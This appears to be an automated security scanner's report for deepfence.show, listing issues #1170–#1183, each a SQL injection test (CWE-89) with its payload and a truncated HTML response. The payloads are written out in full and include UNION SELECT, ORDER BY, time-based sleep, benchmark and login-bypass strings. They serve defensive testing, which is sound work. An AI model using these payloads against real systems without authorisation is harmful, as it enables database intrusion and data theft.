Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1170\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1171\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1172Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1173\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1174\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1175\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1176\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1177\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1178\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# `\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1179\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1180\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1181\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1182\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1183\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 